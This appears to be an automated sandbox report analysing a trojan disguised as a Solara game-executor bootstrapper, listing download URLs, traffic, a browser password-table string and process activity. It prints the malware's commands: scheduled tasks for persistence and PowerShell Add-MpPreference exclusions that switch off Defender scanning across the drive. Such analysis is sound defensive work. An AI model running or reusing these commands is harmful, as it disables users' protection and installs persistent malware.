                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://getsolara.dev/Suspected
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/X
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://getsolara.dev/api/endpoint.json
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://getsolara.dev/asset/discord.json
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
                                    Source: powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://github.com/zzzprojects/html-agility-pack/issues/513
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE73B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pjseRvyK
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE692000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                    Source: BootstrapperV1.19.exeString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                                    Source: unknownHTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.4:49730 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49733 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.4:49734 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49735 version: TLS 1.2
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D26FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,3_2_00D26FAA
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Windows\ELAMBKUP\SIHClient.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Windows\ELAMBKUP\7b3bf1de107bcfJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B8112101_2_00007FFD9B811210
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B80C8641_2_00007FFD9B80C864
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B800E881_2_00007FFD9B800E88
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B800DC81_2_00007FFD9B800DC8
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B800CA81_2_00007FFD9B800CA8
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B7FDA751_2_00007FFD9B7FDA75
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B800E901_2_00007FFD9B800E90
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B800ED31_2_00007FFD9B800ED3
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2848E3_2_00D2848E
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D240FE3_2_00D240FE
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D340883_2_00D34088
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D300B73_2_00D300B7
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D451C93_2_00D451C9
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D371533_2_00D37153
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D362CA3_2_00D362CA
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D232F73_2_00D232F7
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D343BF3_2_00D343BF
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D4D4403_2_00D4D440
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2F4613_2_00D2F461
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2C4263_2_00D2C426
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D377EF3_2_00D377EF
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D4D8EE3_2_00D4D8EE
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2286B3_2_00D2286B
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D519F43_2_00D519F4
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2E9B73_2_00D2E9B7
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D36CDC3_2_00D36CDC
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D33E0B3_2_00D33E0B
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2EFE23_2_00D2EFE2
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D44F9A3_2_00D44F9A
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BAB0D4B13_2_00007FFD9BAB0D4B
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BAB0E4313_2_00007FFD9BAB0E43
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEB51D213_2_00007FFD9BEB51D2
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEA7F4813_2_00007FFD9BEA7F48
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEB446F13_2_00007FFD9BEB446F
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: String function: 00D3EB78 appears 39 times
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: String function: 00D3F5F0 appears 31 times
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: String function: 00D3EC50 appears 56 times
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180
                                    Source: BootstrapperV1.19.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                    Source: BootstrapperV1.19.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                    Source: BootstrapperV1.19.exe, 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe
                                    Source: BootstrapperV1.19.exe, 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs BootstrapperV1.19.exe
                                    Source: BootstrapperV1.19.exe, 00000000.00000003.1692821046.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe
                                    Source: BootstrapperV1.19.exe, 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs BootstrapperV1.19.exe
                                    Source: BootstrapperV1.19.exe, 00000001.00000000.1692761438.00000158AC776000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe
                                    Source: BootstrapperV1.19.exeBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe
                                    Source: BootstrapperV1.19.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.csCryptographic APIs: 'CreateDecryptor'
                                    Source: BootstrapperV1.19.exeBinary or memory string: .sln
                                    Source: BootstrapperV1.19.exeBinary or memory string: .csproj.css
                                    Source: BootstrapperV1.19.exeBinary or memory string: .vbproj.vbs
                                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@86/345@5/6
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D26C74 GetLastError,FormatMessageW,3_2_00D26C74
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00D3A6C2
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeFile created: C:\Users\user\Desktop\DISCORDJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7152
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-BLa09nxFf1DKMOkShfe9
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1508:120:WilError_03
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeFile created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCommand line argument: sfxname3_2_00D3DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCommand line argument: sfxstime3_2_00D3DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCommand line argument: STARTDLG3_2_00D3DF1E
                                    Source: BootstrapperV1.19.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: xqMwd6mr9g.81.dr, Vps7PmWDVK.81.dr, 5MLHhxw7wR.81.dr, YVdYBu0uoY.81.dr, yrXh7kZTCk.81.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: BootstrapperV1.19.exeVirustotal: Detection: 87%
                                    Source: BootstrapperV1.19.exeReversingLabs: Detection: 94%
                                    Source: BootstrapperV1.19.exeString found in binary or memory: --START ERROR INFO--
                                    Source: BootstrapperV1.19.exeString found in binary or memory: chttps://go.microsoft.com/fwlink/p/?LinkId=2124703=MicrosoftEdgeWebview2Setup.exe!/silent /installQWebView2 runtime installed successfully.GError installing WebView2 runtime: iSOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64
                                    Source: BootstrapperV1.19.exeString found in binary or memory: Installed#vc_redist.x64.exe5/install /quiet /norestart
                                    Source: BootstrapperV1.19.exeString found in binary or memory: .aiff.airwapplication/vnd.adobe.air-application-installer-package+zip
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeFile read: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\BootstrapperV1.19.exe "C:\Users\user\Desktop\BootstrapperV1.19.exe"
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeProcess created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe"
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
